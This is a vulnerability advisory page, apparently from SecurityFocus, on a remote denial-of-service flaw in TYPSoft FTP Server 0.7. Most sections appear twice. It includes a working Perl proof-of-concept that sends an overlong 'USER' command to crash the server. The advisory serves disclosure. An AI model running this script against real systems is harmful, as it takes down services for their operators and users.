TYPSoft FTP Server remote DoS Vulnerability
BID:1690
Info
TYPSoft FTP Server remote DoS Vulnerability
| Bugtraq ID: | 1690 |
| Class: | Input Validation Error |
| CVE: |
CVE-2000-1035 |
| Remote: | Yes |
| Local: | Yes |
| Published: | Jun 08 1999 12:00AM |
| Updated: | Jul 11 2009 03:56AM |
| Credit: | This vulnerability was originally reported to bugtraq by dethy <[email protected]>. |
| Vulnerable: |
TYPSoft TYPSoft 0.7 x |
| Not Vulnerable: | |
Discussion
TYPSoft FTP Server remote DoS Vulnerability
Long commands (ie., over 2048 bytes) sent to TYPSoft FTP Server cab cause the server to hang, requiring a manual restart to restore the process.
After the release of this advisory Noam Rathaus from http://www.BeyondSecurity.com contributed the following addendum:
.. "this product is also vulnerable if you connect to the server, but not send anything (do the SYN/ACK sequence but disconnect immediately). This is due to the fact that they use a DELPHI TSocket class, which doesn't handle exceptions very well. "
Long commands (ie., over 2048 bytes) sent to TYPSoft FTP Server cab cause the server to hang, requiring a manual restart to restore the process.
After the release of this advisory Noam Rathaus from http://www.BeyondSecurity.com contributed the following addendum:
.. "this product is also vulnerable if you connect to the server, but not send anything (do the SYN/ACK sequence but disconnect immediately). This is due to the fact that they use a DELPHI TSocket class, which doesn't handle exceptions very well. "
Exploit / POC
TYPSoft FTP Server remote DoS Vulnerability
This exploit was excerpted from the original advisory by dethy (www.synnergy.net):
simple script to send a long 'user' command to the server, resulting
in the ftpd crashing.
================<cut>==================
#!/usr/bin/perl
use Getopt::Std;
use IO::Socket;
getopts('s:', \%args);
if(!defined($args{s})){&usage;}
$serv = $args{s};
$foo = "A"; $number = 2048;
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $args{s},
PeerPort => "ftp(21)",
) || die("Unable to connect to ftp port at $args{s}\n");
$remote->autoflush(1);
print $remote "USER $data". $EOL;
while (<$remote>){ print }
print("\nCrash was successful !\n");
sub usage {die("\n$0 -s <server>\n\n");}
================</cut>====================
This exploit was excerpted from the original advisory by dethy (www.synnergy.net):
simple script to send a long 'user' command to the server, resulting
in the ftpd crashing.
================<cut>==================
#!/usr/bin/perl
use Getopt::Std;
use IO::Socket;
getopts('s:', \%args);
if(!defined($args{s})){&usage;}
$serv = $args{s};
$foo = "A"; $number = 2048;
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $args{s},
PeerPort => "ftp(21)",
) || die("Unable to connect to ftp port at $args{s}\n");
$remote->autoflush(1);
print $remote "USER $data". $EOL;
while (<$remote>){ print }
print("\nCrash was successful !\n");
sub usage {die("\n$0 -s <server>\n\n");}
================</cut>====================
Solution / Fix
TYPSoft FTP Server remote DoS Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
TYPSoft FTP Server remote DoS Vulnerability
References:
References:
- TYPSoft FTP Server remote DoS Problem (Dethy
- TYPSoft web page (TYPSoft)